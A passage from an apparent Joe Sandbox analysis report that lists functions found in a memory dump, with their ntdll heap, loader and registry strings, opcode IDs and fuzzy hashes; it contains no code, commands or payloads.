                                                                                                  • Instruction Fuzzy Hash: 0171FFB1804304AFE750DF14C884B8B7FA8AFC47A4F900469FD598B24AC775D688CBD2
                                                                                                  Function 324E90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                  • API String ID: 0-1391187441
                                                                                                  • Opcode ID: 08d0db84441f15ae0663c5914512459a5c6e3a1239e9c52c66f299c285bd5159
                                                                                                  • Instruction ID: 5cf627be073634852c0f0a9a95a4f7721e3e883e7418a9594f9b62b9855c0782
                                                                                                  • Opcode Fuzzy Hash: 08d0db84441f15ae0663c5914512459a5c6e3a1239e9c52c66f299c285bd5159
                                                                                                  • Instruction Fuzzy Hash: F631CF36901215FFEB02CB54DC84F9AB7B8EF45771F1145A5E805AB291DB70EA40CE60
                                                                                                  Function 32531190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eR2
                                                                                                  • API String ID: 0-2729309950
                                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                  • Instruction ID: 532bcc74e30f3aaa884dae8aa67cdcb21e9dc2dcfc1fb4ab3a3880ba3086f1e7
                                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                  • Instruction Fuzzy Hash: 5531AD72901609BBDB128BA5CD40FEEBBB9FB84754F409025F604E72A0DB70DB04CBA0
                                                                                                  Function 324F7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: 0c15a4f924524f6e51194503bd62eb02ecd7045643812dedfdccad4f02a985a3
                                                                                                  • Instruction ID: 3ff34c86b1537578cbc06fc51f15674a5b9ef05f8df20c30a1dc43315e045f7e
                                                                                                  • Opcode Fuzzy Hash: 0c15a4f924524f6e51194503bd62eb02ecd7045643812dedfdccad4f02a985a3
                                                                                                  • Instruction Fuzzy Hash: BD51FF74A00615EFEB09CF64CA44BADBBB0BF84755F20812AE90293690DB789A45CF80
                                                                                                  Function 32583608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                  • API String ID: 0-1168191160
                                                                                                  • Opcode ID: e187ef0be3b0de662c540ccde2566ab551b82678746230545aad113a5bcd664e
                                                                                                  • Instruction ID: bdfdda416695387a86a87b9372f8180cd7e5773700575913c44c5a4dab43d2df
                                                                                                  • Opcode Fuzzy Hash: e187ef0be3b0de662c540ccde2566ab551b82678746230545aad113a5bcd664e
                                                                                                  • Instruction Fuzzy Hash: 4BF18FB5B01228ABDB20DF14CC80BD9B7B5AF94754F4480E9DA0DA7241EBB19F85CF58
                                                                                                  Function 324F1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 324F1648
                                                                                                  • HEAP[%wZ]: , xrefs: 324F1632
                                                                                                  • HEAP: , xrefs: 324F14B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-3178619729
                                                                                                  • Opcode ID: fdb6686779a57c39ec8f5ccd89690678f943061337db833ce2406d655bd541b8
                                                                                                  • Instruction ID: 76e9e43a3641033b6f37b12913b5f1d1f8e81da988853787228e4c42ea9e1ca0
                                                                                                  • Opcode Fuzzy Hash: fdb6686779a57c39ec8f5ccd89690678f943061337db833ce2406d655bd541b8
                                                                                                  • Instruction Fuzzy Hash: B4E1F174A04345AFE719CF68C490BBABBF1EF88704F54885DE89ACB245EB35E941CB50
                                                                                                  Function 3251F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RTL: Re-Waiting, xrefs: 32560128
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325600C7
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325600F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  • Opcode ID: 24515a905f111c9f8f808fdd9503d2907418b65e525ee0daa987448d516e5a98
                                                                                                  • Instruction ID: 761ed82f04b44c17c0170ef8934626ea524eeae21a2b827b3ce5a03221daca12
                                                                                                  • Opcode Fuzzy Hash: 24515a905f111c9f8f808fdd9503d2907418b65e525ee0daa987448d516e5a98
                                                                                                  • Instruction Fuzzy Hash: 40E1B175608741DFE715CF28C840B1ABBE0BF85368F500A59F5A5CB2E2DB74EA44CB52
                                                                                                  Function 3257330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                  • API String ID: 0-2391371766
                                                                                                  • Opcode ID: 5ca733d55eee63355ae0f4f5402d4d3485775e87cb1a0319894375f1edfcf533
                                                                                                  • Instruction ID: 7ae8ae47c639091f02969b6c7ab070065c80c0b6404c714db4349a37176a376c
                                                                                                  • Opcode Fuzzy Hash: 5ca733d55eee63355ae0f4f5402d4d3485775e87cb1a0319894375f1edfcf533
                                                                                                  • Instruction Fuzzy Hash: 68B1C3B1695351BFE312CF58C984B9BB7E8AF94764F400829FA50DB250DB70EE44CB92
                                                                                                  Function 324EA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  • API String ID: 0-2779062949
                                                                                                  • Opcode ID: 98818a306c1aa8894b8dd2500053fb415ea56efb26421cabb5584fa18fb0e037
                                                                                                  • Instruction ID: 95a399c7ca4cd10aa557ff711045da933f74bd09d86db133d40fa95b81a0a6ce
                                                                                                  • Opcode Fuzzy Hash: 98818a306c1aa8894b8dd2500053fb415ea56efb26421cabb5584fa18fb0e037
                                                                                                  • Instruction Fuzzy Hash: 8DA16B759016299BEB219F24CC88BDAF7B8EF84705F1005EAE909A7250DB759F84CF50
                                                                                                  Function 325CB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • TargetNtPath, xrefs: 325CB3AF
                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325CB3AA
                                                                                                  • GlobalizationUserSettings, xrefs: 325CB3B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                  • API String ID: 0-505981995
                                                                                                  • Opcode ID: 84ce875b5b4dc131ad0c328ec749ea051974ac6c9063aebaef44f828297a7a4c
                                                                                                  • Instruction ID: 1391a2ed9407831ddf6d260f2b66915d12be127a73fa77ec07a7b83155985600
                                                                                                  • Opcode Fuzzy Hash: 84ce875b5b4dc131ad0c328ec749ea051974ac6c9063aebaef44f828297a7a4c
                                                                                                  • Instruction Fuzzy Hash: 49617072981238ABDB21DF94DC88BDAB7B8BB54714F4101E5E908A7250EB74DF84CF90
                                                                                                  Function 324EF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3254E455
                                                                                                  • HEAP[%wZ]: , xrefs: 3254E435
                                                                                                  • HEAP: , xrefs: 3254E442
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                  • API String ID: 0-1340214556
                                                                                                  • Opcode ID: 78238502f64a52b4f11ce33a0b60cb61df267238fd49efd7fdfa8467f2620a85
                                                                                                  • Instruction ID: 201411a2e8c549be7cac057bb37fdfe470b1a096e9df197002945175c6c7882c
                                                                                                  • Opcode Fuzzy Hash: 78238502f64a52b4f11ce33a0b60cb61df267238fd49efd7fdfa8467f2620a85
                                                                                                  • Instruction Fuzzy Hash: CA511335640784AFF316CBA8C884F9AFBF8FF04788F0541A5E9518B692DB74EA41CB50
                                                                                                  Function 3259D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP[%wZ]: , xrefs: 3259D792
                                                                                                  • HEAP: , xrefs: 3259D79F
                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3259D7B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                  • API String ID: 0-3815128232
                                                                                                  • Opcode ID: c9f5985ef6dc032e77da56127eb37d0ea4284413c6a2a0d38f414a078f89f999
                                                                                                  • Instruction ID: cedd17a2c4abdef4c86abaef5841eb81bc2e0d0a2d4aa962db7fbf6cf07db64e
                                                                                                  • Opcode Fuzzy Hash: c9f5985ef6dc032e77da56127eb37d0ea4284413c6a2a0d38f414a078f89f999
                                                                                                  • Instruction Fuzzy Hash: CA5104791023508AF354EF29C8407F27BE1DB55289F514C4DE8C58B685DA3BDA47DB60
                                                                                                  Function 324FA1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 324FA229
                                                                                                  • @SL2, xrefs: 324FA268
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 324FA21B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @SL2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  • API String ID: 0-2018493835
                                                                                                  • Opcode ID: bf963a8ad148215dcd3c1205d6174b3ad066ceac5cb2ffd314de563428463cc4
                                                                                                  • Instruction ID: 5f04dbeb56be4dc88f2e7995591bd9d3ee399013902d73070d9a34cd67888069
                                                                                                  • Opcode Fuzzy Hash: bf963a8ad148215dcd3c1205d6174b3ad066ceac5cb2ffd314de563428463cc4
                                                                                                  • Instruction Fuzzy Hash: FC419D78700754ABD705CF59C840B597BB4FF85B54F2180A6EC14EF3A1EA76DA81CB11
                                                                                                  Function 3257B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • GlobalFlag, xrefs: 3257B30F
                                                                                                  • @, xrefs: 3257B2F0
                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3257B2B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                  • API String ID: 0-4192008846
                                                                                                  • Opcode ID: 46badd9d571d39636fe764f693980f24dde4f024eca95c4a1348e3a357ef6d98
                                                                                                  • Instruction ID: 3a06e0809991c24099d50763b7abca66090997ec703dfd8283478dbc4ae4e716
                                                                                                  • Opcode Fuzzy Hash: 46badd9d571d39636fe764f693980f24dde4f024eca95c4a1348e3a357ef6d98
                                                                                                  • Instruction Fuzzy Hash: 4A314BB5950209ABDB01DF98DC80BEEBBBCEF44344F800469E605E7241EA749F448B90
                                                                                                  Function 325051C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@
                                                                                                  • API String ID: 0-149943524
                                                                                                  • Opcode ID: 60684a64d96e4e0d079083f0a85795c6010e95cdb819df109508e9a1544639dc
                                                                                                  • Instruction ID: 335d1e9c86d0e339ede1414ea97ea97328c155e9e195e7df10293113098180cb
                                                                                                  • Opcode Fuzzy Hash: 60684a64d96e4e0d079083f0a85795c6010e95cdb819df109508e9a1544639dc
                                                                                                  • Instruction Fuzzy Hash: 31328FB85083518BD724CF14C89076EBBE1FF89758F50892EF98597290EB74DA84CF52
                                                                                                  Function 324F5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: d31ada9d0cc2156a3781b6e3a4798cf96c96d34d32280ae033831ecfb0d84d2d
                                                                                                  • Instruction ID: 7f5d34940a8c35151680046f58646ac7fae8470175e6b1953ede93518edafb8c
                                                                                                  • Opcode Fuzzy Hash: d31ada9d0cc2156a3781b6e3a4798cf96c96d34d32280ae033831ecfb0d84d2d
                                                                                                  • Instruction Fuzzy Hash: 8F31B035201B12FFE7459B64CA40B8AFBA5BF88B54F404019E91587A50DBB1EA61CF90
                                                                                                  Function 3256E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  • API String ID: 2994545307-634100481
                                                                                                  • Opcode ID: 76d06c0ad58303ff4c82eeac8dff220c486fa427c6b20a34bf3825a14726d81d
                                                                                                  • Instruction ID: f218a83bfa7815cef0555d1c3cb3f7cdc131f742e5e4c447308c664ea7ff8314
                                                                                                  • Opcode Fuzzy Hash: 76d06c0ad58303ff4c82eeac8dff220c486fa427c6b20a34bf3825a14726d81d
                                                                                                  • Instruction Fuzzy Hash: 6A615CB1A413089FDB15CFA8C940FADBBB4FB58748F54542AE649EB251EB30DE41CB90
                                                                                                  Function 325CB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 325CB5C4
                                                                                                  • RedirectedKey, xrefs: 325CB60E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                  • API String ID: 0-1388552009
                                                                                                  • Opcode ID: 20331279a8ff3d734d42ad24526900d7f4362800a2efae94e4d46e3079ef3cad
                                                                                                  • Instruction ID: 730ef950adcc66ea69d70e3406c3e7df27967df18efca4ebe7e4b13b620c3001
                                                                                                  • Opcode Fuzzy Hash: 20331279a8ff3d734d42ad24526900d7f4362800a2efae94e4d46e3079ef3cad
                                                                                                  • Instruction Fuzzy Hash: 7B61F5B5C81229EBDB11DFD4C948ADEBFB8FF48714F50446AE805A7210EB749A85CF90
                                                                                                  Function 3250F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$$
                                                                                                  • API String ID: 3446177414-233714265
                                                                                                  • Opcode ID: 81efd26e07806683fd4da64ade469da0252c7c528129ab8537cda9021e03109a
                                                                                                  • Instruction ID: 9c7230abb908b9d2de0e34155e86607dab10a1d1f332314deb8dbd5b0c9283cb
                                                                                                  • Opcode Fuzzy Hash: 81efd26e07806683fd4da64ade469da0252c7c528129ab8537cda9021e03109a
                                                                                                  • Instruction Fuzzy Hash: EC61BE75A01749DBEB20CFA4C980B9DBBB1BF84718F508469D505AB690CFB5BB41CF90
                                                                                                  Function 3258314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                  • API String ID: 0-118005554
                                                                                                  • Opcode ID: fa25326bd50c3ae377228289e4a5ef188ae45119f0697f835ccb7cd512bab8cf
                                                                                                  • Instruction ID: 684781a2abacc64ba04b93baf771337782ea90d04bcab757bf7d380b35b2dad3
                                                                                                  • Opcode Fuzzy Hash: fa25326bd50c3ae377228289e4a5ef188ae45119f0697f835ccb7cd512bab8cf
                                                                                                  • Instruction Fuzzy Hash: 1831BE75209781ABD301CB68D840B2ABBE4FFD5B54F400869FD59CB390EBB1DA05CB52
                                                                                                  Function 324F06CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N2$ N2
                                                                                                  • API String ID: 0-1487462276
                                                                                                  • Opcode ID: 7d8d446270aa35c1756fd8f672af5698099ad123de63052c59b2221d1a46e6fa
                                                                                                  • Instruction ID: bdd82073c173946aa80fa37b7ba6faa155644a0fc760d6b43b91c4f7f6b67bee
                                                                                                  • Opcode Fuzzy Hash: 7d8d446270aa35c1756fd8f672af5698099ad123de63052c59b2221d1a46e6fa
                                                                                                  • Instruction Fuzzy Hash: 2A31DF36A04B41BBE716DE24C880E9BBBE5AFC42A0F0155A9FC1597314EE31DC05CFA1
                                                                                                  Function 325231BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
